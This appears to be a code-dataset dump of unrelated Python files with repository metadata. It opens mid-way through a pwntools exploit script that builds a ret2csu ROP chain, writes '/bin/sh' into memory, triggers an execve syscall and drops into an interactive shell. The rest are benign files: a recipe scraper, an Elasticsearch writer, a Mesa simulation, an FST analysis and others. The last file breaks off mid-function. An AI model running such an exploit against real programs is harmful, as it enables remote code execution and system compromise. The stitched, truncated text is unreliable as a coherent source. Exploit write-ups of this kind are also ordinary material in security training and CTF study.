x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e'
proc.send(payload)
time.sleep(0.2)
proc.recvrepeat(0)
payload = p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.got['read'])
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x1)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.bss())
payload += p64(0x3b)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(target_base + target.bss())
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
proc.send(payload)
time.sleep(0.2)
payload = b'\x0e'
proc.send(payload)
time.sleep(0.2)
payload = b'\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
proc.send(payload)
time.sleep(0.2)
proc.interactive()
| 0 | 0 | 0 |
4f46a39ae434d903a111c5c0903dc93e04f76bf6 | 2,447 | py | Python | recipe_parser/recipes/allrecipes.py | tyler-a-cox/recipe-parsing | fa883f66a39063cf72912527628b082cda455e76 | [
"MIT"
] | null | null | null | recipe_parser/recipes/allrecipes.py | tyler-a-cox/recipe-parsing | fa883f66a39063cf72912527628b082cda455e76 | [
"MIT"
] | null | null | null | recipe_parser/recipes/allrecipes.py | tyler-a-cox/recipe-parsing | fa883f66a39063cf72912527628b082cda455e76 | [
"MIT"
] | null | null | null | import inspect
from bs4 import BeautifulSoup
from typing import Optional, Union
from ._settings import HEADERS
from ._schema import DefaultSchema
from ._utils import clean_vulgar_fraction, clean_unicode
class AllRecipes(DefaultSchema):
"""
"""
@classmethod
def __init__(self, url: str, headers: Optional[dict] = HEADERS):
"""
url : str
url
headers : dict, Optional
dict
"""
super().__init__(url)
self.soup = BeautifulSoup(self.page, "html.parser")
def title(self):
"""
"""
return self.soup.find("meta", {"property": "og:title"}).get("content")
def description(self):
"""
"""
return self.soup.find("meta", {"property": "og:description"}).get("content")
def instructions(self):
"""
"""
tags = self.soup.find("ul", {"class": "instructions-section"}).find_all("p")
return [tag.get_text() for tag in tags]
def author(self):
"""
"""
return self.soup.find("span", {"class": "author-name authorName"}).get_text()
def ratings(self):
"""
"""
return self.soup.find("meta", {"name": "og:rating"}).get("content")
def yields(self):
"""
"""
pass
def time(self) -> float:
"""
"""
pass
def category(self) -> list:
"""
"""
return [
self.soup.find("a", {"class": "breadcrumbs__link--last"})
.find("span")
.get_text()
]
def nutrition(self) -> dict:
"""
"""
nutrition = {}
text = (
self.soup.find("div", {"class": "recipe-nutrition-section"})
.find("div", {"class": "section-body"})
.get_text()
.strip()
)
if text.endswith("Full Nutrition"):
text = text.replace(". Full Nutrition", "")
text = text.split(";")
nutrition["Calories"] = float(text[0].split(" ")[0])
for t in text[1:]:
nutrient, amount = t.strip().split(" ")
nutrition[nutrient] = amount
return nutrition
def ingredients(self) -> list:
"""
"""
tags = self.soup.find_all("span", {"class": "ingredients-item-name"})
return [clean_unicode(tag.get_text()) for tag in tags]
| 24.47 | 85 | 0.509195 | import inspect
from bs4 import BeautifulSoup
from typing import Optional, Union
from ._settings import HEADERS
from ._schema import DefaultSchema
from ._utils import clean_vulgar_fraction, clean_unicode
class AllRecipes(DefaultSchema):
"""
"""
@classmethod
def host(cls):
return "allrecipes.com"
def __init__(self, url: str, headers: Optional[dict] = HEADERS):
"""
url : str
url
headers : dict, Optional
dict
"""
super().__init__(url)
self.soup = BeautifulSoup(self.page, "html.parser")
def title(self):
"""
"""
return self.soup.find("meta", {"property": "og:title"}).get("content")
def description(self):
"""
"""
return self.soup.find("meta", {"property": "og:description"}).get("content")
def instructions(self):
"""
"""
tags = self.soup.find("ul", {"class": "instructions-section"}).find_all("p")
return [tag.get_text() for tag in tags]
def author(self):
"""
"""
return self.soup.find("span", {"class": "author-name authorName"}).get_text()
def ratings(self):
"""
"""
return self.soup.find("meta", {"name": "og:rating"}).get("content")
def yields(self):
"""
"""
pass
def time(self) -> float:
"""
"""
pass
def category(self) -> list:
"""
"""
return [
self.soup.find("a", {"class": "breadcrumbs__link--last"})
.find("span")
.get_text()
]
def nutrition(self) -> dict:
"""
"""
nutrition = {}
text = (
self.soup.find("div", {"class": "recipe-nutrition-section"})
.find("div", {"class": "section-body"})
.get_text()
.strip()
)
if text.endswith("Full Nutrition"):
text = text.replace(". Full Nutrition", "")
text = text.split(";")
nutrition["Calories"] = float(text[0].split(" ")[0])
for t in text[1:]:
nutrient, amount = t.strip().split(" ")
nutrition[nutrient] = amount
return nutrition
def ingredients(self) -> list:
"""
"""
tags = self.soup.find_all("span", {"class": "ingredients-item-name"})
return [clean_unicode(tag.get_text()) for tag in tags]
| 25 | 0 | 26 |
802a3bd1834812a7a38a6c8b32a5bf8db0b48403 | 879 | py | Python | tests/test_docs.py | regebro/passwordmetrics | 47f5c6eaad3b3f503094fdb456befa8bcb8a1b19 | [
"MIT"
] | 6 | 2015-04-29T17:07:55.000Z | 2021-08-06T14:28:20.000Z | tests/test_docs.py | regebro/passwordmetrics | 47f5c6eaad3b3f503094fdb456befa8bcb8a1b19 | [
"MIT"
] | null | null | null | tests/test_docs.py | regebro/passwordmetrics | 47f5c6eaad3b3f503094fdb456befa8bcb8a1b19 | [
"MIT"
] | 1 | 2017-12-23T06:36:26.000Z | 2017-12-23T06:36:26.000Z | import sys
import re
import doctest
import manuel.doctest
import manuel.codeblock
import manuel.testing
import unittest
if sys.version_info[0] < 3:
# Just don't do them under Python 3.
# Sigh.
if __name__ == '__main__':
unittest.TextTestRunner().run(additional_tests())
| 30.310345 | 83 | 0.613197 | import sys
import re
import doctest
import manuel.doctest
import manuel.codeblock
import manuel.testing
import unittest
if sys.version_info[0] < 3:
# Just don't do them under Python 3.
# Sigh.
class CustomChecker(doctest.OutputChecker):
def check_output(self, want, got, optionflags):
got = re.sub("set\(\[([^\]]+?)\]\)", "{\\1}", got)
got = re.sub("set\(\[]\)", "set()", got)
return doctest.OutputChecker.check_output(self, want, got, optionflags)
def additional_tests():
m = manuel.doctest.Manuel(optionflags=doctest.NORMALIZE_WHITESPACE,
checker=CustomChecker())
m += manuel.codeblock.Manuel()
return manuel.testing.TestSuite(m, r'../docs/usage.rst')
if __name__ == '__main__':
unittest.TextTestRunner().run(additional_tests())
| 483 | 22 | 89 |
71336ba4933f2a37f7f3b0fdded458adb63b6c1d | 1,238 | py | Python | final_flask/run_ml.py | madbee99/Final_Project | 154edb302b6b4494b277e732f72efd1163589c3e | [
"MIT"
] | null | null | null | final_flask/run_ml.py | madbee99/Final_Project | 154edb302b6b4494b277e732f72efd1163589c3e | [
"MIT"
] | null | null | null | final_flask/run_ml.py | madbee99/Final_Project | 154edb302b6b4494b277e732f72efd1163589c3e | [
"MIT"
] | null | null | null | import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import psycopg2
from sqlalchemy import create_engine
from config import db_password
#data from: https://www.kaggle.com/malapatiravi/graduate-school-admission-data/home
| 34.388889 | 95 | 0.753635 | import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import psycopg2
from sqlalchemy import create_engine
from config import db_password
#data from: https://www.kaggle.com/malapatiravi/graduate-school-admission-data/home
def predictions(gre, gpa, undergrad_school_rank):
db_string = f"postgresql://postgres:{db_password}@localhost:5432/Final_Project"
engine = create_engine(db_string)
model_df = pd.read_sql('''SELECT * FROM CLEAN_MODEL_DATA''', con = engine)
X = model_df[['gre','gpa','rank']]
y = model_df['admit']
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, random_state=1)
scaler = StandardScaler().fit(X_train)
X_train_scaled = scaler.transform(X_train)
X_test_scaled = scaler.transform(X_test)
classifier = LogisticRegression(class_weight = 'balanced')
classifier.fit(X_train_scaled, y_train)
print(f"Training Data Score: {classifier.score(X_train_scaled, y_train)}")
print(f"Testing Data Score: {classifier.score(X_test_scaled, y_test)}")
return classifier.predict([[gre, gpa, undergrad_school_rank]])
| 865 | 0 | 23 |
289c138c6b453a9bc534345857c55549ca620b34 | 2,781 | py | Python | Code/other/my-epstein/civil_violence/server.py | joekroese/math-of-revolution | c831ea3d5f6c56c3861522f71ec47e1a22f9ff2c | [
"MIT"
] | 2 | 2019-12-07T18:16:46.000Z | 2020-06-16T10:54:20.000Z | Code/other/my-epstein/civil_violence/server.py | joekroese/math-of-revolution | c831ea3d5f6c56c3861522f71ec47e1a22f9ff2c | [
"MIT"
] | null | null | null | Code/other/my-epstein/civil_violence/server.py | joekroese/math-of-revolution | c831ea3d5f6c56c3861522f71ec47e1a22f9ff2c | [
"MIT"
] | null | null | null | from mesa.visualization.ModularVisualization import ModularServer
from mesa.visualization.modules import CanvasGrid
from mesa.visualization.UserParam import UserSettableParameter
from mesa.visualization.modules import ChartModule
from .model import CivilViolenceModel
from .agent import Citizen, Cop
COP_COLOR = "Black"
AGENT_QUIET_COLOR = "Blue"
AGENT_REBEL_COLOR = "Red"
JAIL_COLOR = "Grey"
height=70
width=70
model_params = {
'height':height,
'width':width,
# 'height': UserSettableParameter('slider', 'Height', 40, 10, 100, 1,
# description='Citizen Density'),
# 'width': UserSettableParameter('slider', 'Width', 40, 10, 100, 1,
# description='Citizen Density'),
'citizen_density': UserSettableParameter('slider', 'Citizen Density', 0.7, 0.0, 1, 0.01,
description='Citizen Density'),
'cop_density': UserSettableParameter('slider', 'Cop Density', 0.1, 0.0, 1, 0.01,
description='Cop Density'),
'citizen_vision': UserSettableParameter('slider', 'Citizen Vision', 7, 0, 20, 1,
description='Citizen vision'),
'cop_vision': UserSettableParameter('slider', 'Cop Vision', 7, 0, 20, 1,
description='Cop Vision'),
'legitimacy': UserSettableParameter('slider', 'Legitimacy', 0.8, 0.0, 1.0, 0.01,
description='Legitimacy'),
'max_jail_term': UserSettableParameter('slider', 'Max Jail Term', 1000, 0, 10000, 1,
description='Max Jail Term')
}
chart = ChartModule([{"Label": "Active",
"Color": "Red"}],
data_collector_name='datacollector')
canvas_element = CanvasGrid(citizen_cop_portrayal, model_params['height'], model_params['height'], 700, 700)
server = ModularServer(CivilViolenceModel, [canvas_element, chart],
"Epstein Civil Violence", model_params)
| 40.304348 | 108 | 0.57749 | from mesa.visualization.ModularVisualization import ModularServer
from mesa.visualization.modules import CanvasGrid
from mesa.visualization.UserParam import UserSettableParameter
from mesa.visualization.modules import ChartModule
from .model import CivilViolenceModel
from .agent import Citizen, Cop
COP_COLOR = "Black"
AGENT_QUIET_COLOR = "Blue"
AGENT_REBEL_COLOR = "Red"
JAIL_COLOR = "Grey"
def citizen_cop_portrayal(agent):
if agent is None:
return
portrayal = {"Shape": "circle",
"x": agent.pos[0], "y": agent.pos[1],
"Filled": "true"}
if type(agent) is Citizen:
color = AGENT_QUIET_COLOR if agent.condition == "Quiescent" else \
AGENT_REBEL_COLOR
color = JAIL_COLOR if agent.jail_sentence else color
portrayal["Color"] = color
portrayal["r"] = 0.8
portrayal["Layer"] = 0
elif type(agent) is Cop:
portrayal["Color"] = COP_COLOR
portrayal["r"] = 0.5
portrayal["Layer"] = 1
return portrayal
height=70
width=70
model_params = {
'height':height,
'width':width,
# 'height': UserSettableParameter('slider', 'Height', 40, 10, 100, 1,
# description='Citizen Density'),
# 'width': UserSettableParameter('slider', 'Width', 40, 10, 100, 1,
# description='Citizen Density'),
'citizen_density': UserSettableParameter('slider', 'Citizen Density', 0.7, 0.0, 1, 0.01,
description='Citizen Density'),
'cop_density': UserSettableParameter('slider', 'Cop Density', 0.1, 0.0, 1, 0.01,
description='Cop Density'),
'citizen_vision': UserSettableParameter('slider', 'Citizen Vision', 7, 0, 20, 1,
description='Citizen vision'),
'cop_vision': UserSettableParameter('slider', 'Cop Vision', 7, 0, 20, 1,
description='Cop Vision'),
'legitimacy': UserSettableParameter('slider', 'Legitimacy', 0.8, 0.0, 1.0, 0.01,
description='Legitimacy'),
'max_jail_term': UserSettableParameter('slider', 'Max Jail Term', 1000, 0, 10000, 1,
description='Max Jail Term')
}
chart = ChartModule([{"Label": "Active",
"Color": "Red"}],
data_collector_name='datacollector')
canvas_element = CanvasGrid(citizen_cop_portrayal, model_params['height'], model_params['height'], 700, 700)
server = ModularServer(CivilViolenceModel, [canvas_element, chart],
"Epstein Civil Violence", model_params)
| 619 | 0 | 23 |
bb57351e558e0a9c4d003f9fbfa6974828e96c87 | 4,874 | py | Python | tube/etl/outputs/es/writer.py | plooploops/tube | 4ca697b7714b057c78fdb80f88edba37e837262e | [
"Apache-2.0"
] | null | null | null | tube/etl/outputs/es/writer.py | plooploops/tube | 4ca697b7714b057c78fdb80f88edba37e837262e | [
"Apache-2.0"
] | 2 | 2021-03-24T16:04:22.000Z | 2021-03-30T12:54:07.000Z | tube/etl/outputs/es/writer.py | plooploops/tube | 4ca697b7714b057c78fdb80f88edba37e837262e | [
"Apache-2.0"
] | null | null | null | import json
from elasticsearch import Elasticsearch
from tube.etl.outputs.es.timestamp import (
putting_timestamp,
get_latest_utc_transaction_time,
)
from tube.etl.outputs.es.versioning import Versioning
from tube.etl.plugins import post_process_plugins, add_auth_resource_path_mapping
from tube.etl.spark_base import SparkBase
from tube.utils.general import get_node_id_name
| 34.814286 | 86 | 0.598277 | import json
from elasticsearch import Elasticsearch
from tube.etl.outputs.es.timestamp import (
putting_timestamp,
get_latest_utc_transaction_time,
)
from tube.etl.outputs.es.versioning import Versioning
from tube.etl.plugins import post_process_plugins, add_auth_resource_path_mapping
from tube.etl.spark_base import SparkBase
from tube.utils.general import get_node_id_name
def json_export(x, doc_type):
x[1][get_node_id_name(doc_type)] = x[0]
x[1]["node_id"] = x[0] # redundant field for backward compatibility with arranger
return (x[0], json.dumps(x[1]))
class Writer(SparkBase):
def __init__(self, sc, config):
super(Writer, self).__init__(sc, config)
self.es_config = self.config.ES
self.es = self.get_es()
self.es.indices.get_alias()
self.versioning = Versioning(self.es)
def reset_status(self):
self.versioning.reset_status()
def generate_mapping(self, doc_name, field_types):
"""
:param doc_name: name of the Elasticsearch document to create mapping for
:param field_types: dictionary of field and their types
:return: JSON with proper mapping to be used in Elasticsearch
"""
es_type = {str: "keyword", float: "float", int: "long"}
properties = {
k: {"type": es_type[v[0]]}
if v[0] is not str
else {"type": es_type[v[0]], "fields": {"analyzed": {"type": "text"}}}
for k, v in list(field_types.items())
}
# explicitly mapping 'node_id'
properties["node_id"] = {"type": "keyword"}
mapping = {"mappings": {doc_name: {"properties": properties}}}
return mapping
def get_es(self):
"""
Create ElasticSearch instance
:return:
"""
es_hosts = self.es_config["es.nodes"]
es_port = self.es_config["es.port"]
return Elasticsearch([{"host": es_hosts, "port": es_port}])
def write_to_new_index(self, df, index, doc_type):
df = df.map(lambda x: json_export(x, doc_type))
es_config = self.es_config
es_config["es.resource"] = index + "/{}".format(doc_type)
df.saveAsNewAPIHadoopFile(
path="-",
outputFormatClass="org.elasticsearch.hadoop.mr.EsOutputFormat",
keyClass="org.apache.hadoop.io.NullWritable",
valueClass="org.elasticsearch.hadoop.mr.LinkedMapWritable",
conf=es_config,
)
def create_guppy_array_config(self, etl_index_name, types):
"""
Create index with Guppy configuration for array fields
:param etl_index_name:
:param types:
"""
index = "{}-array-config".format(etl_index_name)
alias = "{}_array-config".format(etl_index_name.split("_")[0])
mapping = {
"mappings": {
"_doc": {
"properties": {
"timestamp": {"type": "date"},
"array": {"type": "keyword"},
}
}
}
}
latest_transaction_time = get_latest_utc_transaction_time()
doc = {
"timestamp": latest_transaction_time,
"array": ["{}".format(k) for k, v in list(types.items()) if v[1]],
}
try:
self.reset_status()
index_to_write = self.versioning.create_new_index(
mapping, self.versioning.get_next_index_version(index)
)
self.es.index(index_to_write, "_doc", id=etl_index_name, body=doc)
self.versioning.putting_new_version_tag(index_to_write, index)
self.versioning.putting_new_version_tag(index_to_write, alias)
putting_timestamp(self.es, index_to_write)
self.reset_status()
except Exception as e:
print(e)
def write_df(self, df, index, doc_type, types):
"""
Function to write the data frame to ElasticSearch
:param df: data frame to be written
:param index: name of the index
:param doc_type: document type's name
:param types:
:return:
"""
try:
for plugin in post_process_plugins:
df = df.map(lambda x: plugin(x))
types = add_auth_resource_path_mapping(types)
mapping = self.generate_mapping(doc_type, types)
self.reset_status()
index_to_write = self.versioning.create_new_index(
mapping, self.versioning.get_next_index_version(index)
)
self.write_to_new_index(df, index_to_write, doc_type)
self.versioning.putting_new_version_tag(index_to_write, index)
putting_timestamp(self.es, index_to_write)
self.reset_status()
except Exception as e:
print(e)
| 916 | 3,524 | 46 |
f1f3adb057037033ad40b0b8a142e4de788ee12b | 1,724 | py | Python | classes/utility.py | aryanmsr/Drone_Delivery | ca682faa4396030fb948e1f289f541bac6e2cf27 | [
"MIT"
] | 1 | 2021-09-10T22:36:04.000Z | 2021-09-10T22:36:04.000Z | classes/utility.py | aryanmsr/Drone_Delivery | ca682faa4396030fb948e1f289f541bac6e2cf27 | [
"MIT"
] | null | null | null | classes/utility.py | aryanmsr/Drone_Delivery | ca682faa4396030fb948e1f289f541bac6e2cf27 | [
"MIT"
] | 1 | 2021-03-09T17:17:13.000Z | 2021-03-09T17:17:13.000Z | import math
from classes.dataframes import *
import numpy as np
# class Utility:
#
# def __init__(self):
# self.Data = Dataframes()
# self.df_orders = self.Data.get_df_orders()
# self.grid_rows = self.Data.grid_row
# self.grid_cols = self.Data.grid_col
# self.df_wrhs = self.Data.get_df_wareouses()
# def calc_distance(self, xa, ya, xb, yb):
# return math.sqrt((abs(xa - xb)) ** 2 + (abs(ya - yb)) ** 2)
| 30.245614 | 82 | 0.534223 | import math
from classes.dataframes import *
import numpy as np
# class Utility:
#
# def __init__(self):
# self.Data = Dataframes()
# self.df_orders = self.Data.get_df_orders()
# self.grid_rows = self.Data.grid_row
# self.grid_cols = self.Data.grid_col
# self.df_wrhs = self.Data.get_df_wareouses()
# def calc_distance(self, xa, ya, xb, yb):
# return math.sqrt((abs(xa - xb)) ** 2 + (abs(ya - yb)) ** 2)
def dist(a, b):
if isinstance(a, np.ndarray) or isinstance(b, np.ndarray):
return np.sqrt(((a - b) ** 2).sum(1))
return np.sqrt((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2)
def num_turns(self, dist):
return math.ceil(dist)
# get closest order location and distance to current drone position
# def get_closest_order(self, cur_pos):
# min = math.sqrt(self.grid_rows ** 2 + self.grid_cols ** 2)
# x_pos, y_pos = 0, 0
# for index, row in self.df_orders.iterrows():
# tmp = self.calc_distance(cur_pos[0], cur_pos[1], row["X"], row["Y"])
# if tmp < min:
# min = tmp
# x_pos = row["X"]
# y_pos = row["Y"]
# return [min, x_pos, y_pos]
#
#
# def get_closest_warehouse(self, cur_pos):
# min = math.sqrt(self.grid_rows ** 2 + self.grid_cols ** 2)
# x_pos, y_pos = 0, 0
# for index, row in self.df_wrhs.iterrows():
# tmp = self.calc_distance(cur_pos[0], cur_pos[1], row["X"], row["Y"])
# if tmp < min:
# min = tmp
# x_pos = row["X"]
# y_pos = row["Y"]
# return [min, x_pos, y_pos]
# def find_new_pos(self, xa, ya, xb, yb):
| 1,222 | 0 | 46 |
ec6d03f3c81832af35ad4292ffbea309d914297d | 1,312 | py | Python | models/actors.py | wanderindev/udacity-casting-agency | a123ff26ffc565bfff4f4f829ae7613a6ccb366d | [
"MIT"
] | 1 | 2021-01-10T19:34:24.000Z | 2021-01-10T19:34:24.000Z | models/actors.py | wanderindev/udacity-casting-agency | a123ff26ffc565bfff4f4f829ae7613a6ccb366d | [
"MIT"
] | 1 | 2021-04-30T21:07:42.000Z | 2021-04-30T21:07:42.000Z | models/actors.py | wanderindev/udacity-casting-agency | a123ff26ffc565bfff4f4f829ae7613a6ccb366d | [
"MIT"
] | null | null | null | from typing import Dict, List, Union
from sqlalchemy.dialects.postgresql import ENUM
from db import db
from models.model_mixin import ModelMixin
ActorJSON = Dict[str, Union[int, str, List[str]]]
gender_enum = ENUM("Male", "Female", name="gender")
class ActorModel(db.Model, ModelMixin):
"""SQLAlchemy model for actors"""
__tablename__ = "actors"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
date_of_birth = db.Column(db.Date, nullable=False)
gender = db.Column(gender_enum)
@classmethod
@classmethod
@classmethod
| 29.818182 | 62 | 0.623476 | from typing import Dict, List, Union
from sqlalchemy.dialects.postgresql import ENUM
from db import db
from models.model_mixin import ModelMixin
ActorJSON = Dict[str, Union[int, str, List[str]]]
gender_enum = ENUM("Male", "Female", name="gender")
class ActorModel(db.Model, ModelMixin):
"""SQLAlchemy model for actors"""
__tablename__ = "actors"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
date_of_birth = db.Column(db.Date, nullable=False)
gender = db.Column(gender_enum)
def __init__(self, **kwargs):
super(ActorModel, self).__init__(**kwargs)
@classmethod
def find_all(cls) -> List["ActorModel"]:
return cls.query.order_by(ActorModel.name).all()
@classmethod
def find_by_id(cls, _id: int) -> "ActorModel":
return cls.query.filter_by(id=_id).first()
@classmethod
def find_by_name(cls, name: str) -> "ActorModel":
return cls.query.filter_by(name=name).first()
def json(self) -> ActorJSON:
return {
"id": self.id,
"name": self.name,
"date_of_birth": self.date_of_birth,
"gender": self.gender,
"movies": [movie.title for movie in self.movies],
}
| 542 | 0 | 139 |
a31eed23d55b6f7f1f91bb159c2db44ee1f8820c | 2,535 | py | Python | wgs/geno2hierfst.py | trmznt/pys | 0f66d52e5d166140c3358f8c6af9ad4cee2e2b7e | [
"MIT"
] | null | null | null | wgs/geno2hierfst.py | trmznt/pys | 0f66d52e5d166140c3358f8c6af9ad4cee2e2b7e | [
"MIT"
] | null | null | null | wgs/geno2hierfst.py | trmznt/pys | 0f66d52e5d166140c3358f8c6af9ad4cee2e2b7e | [
"MIT"
] | 2 | 2018-09-19T00:52:15.000Z | 2021-05-14T23:04:47.000Z | #!/usr/bin/env spcli
# this command runs hierarchical FST comparison
from seqpy import cout, cerr
from seqpy.cmds import arg_parser
from seqpy.core.bioio import tabparser
import itertools
import allel
| 28.483146 | 91 | 0.584615 | #!/usr/bin/env spcli
# this command runs hierarchical FST comparison
from seqpy import cout, cerr
from seqpy.cmds import arg_parser
from seqpy.core.bioio import tabparser
import itertools
import allel
def init_argparser(p=None):
p = tabparser.init_argparser()
p.add_argument('--hierfile', required=True, help="file describing hierarchical groups")
p.add_argument('--cumfst', type=float, default=2.0)
p.add_argument('--minfst', type=float, default=0.75)
return p
def main( args ):
geno2hierfst( args )
def geno2hierfst( args ):
genoparser = tabparser.GenotypeLineParser( args )
genoparser.set_translator(genoparser.diploid_translator)
cerr('Grouping:')
groups = genoparser.parse_grouping()
for k in groups:
cout(' %12s %3d' % (k, len(groups[k])))
hierarchy = []
with open(args.hierfile) as hierfile:
for line in hierfile:
line = line.strip()
if not line: continue
if line.startswith('#'): continue
partitions = line.split('\t')
print(partitions)
par1 = list(itertools.chain.from_iterable(
groups[k] for k in partitions[0].split(',')))
par2 = list(itertools.chain.from_iterable(
groups[k] for k in partitions[1].split(',')))
hierarchy.append( (par1, par2) )
cerr('[I: preparing %d hierarchy]' % len(hierarchy))
cerr('[I: reading genotype file...]')
genotypes = genoparser.parse_all()
genoarray = allel.GenotypeArray( genotypes )
#import IPython; IPython.embed()
del genotypes
selected_positions = []
c = 1
for (grp1, grp2) in hierarchy:
cerr('[I: processing hierarchy #%d]' % c)
FST = []
ac_g1 = genoarray.count_alleles(subpop = grp1)
ac_g2 = genoarray.count_alleles(subpop = grp2)
#import IPython; IPython.embed()
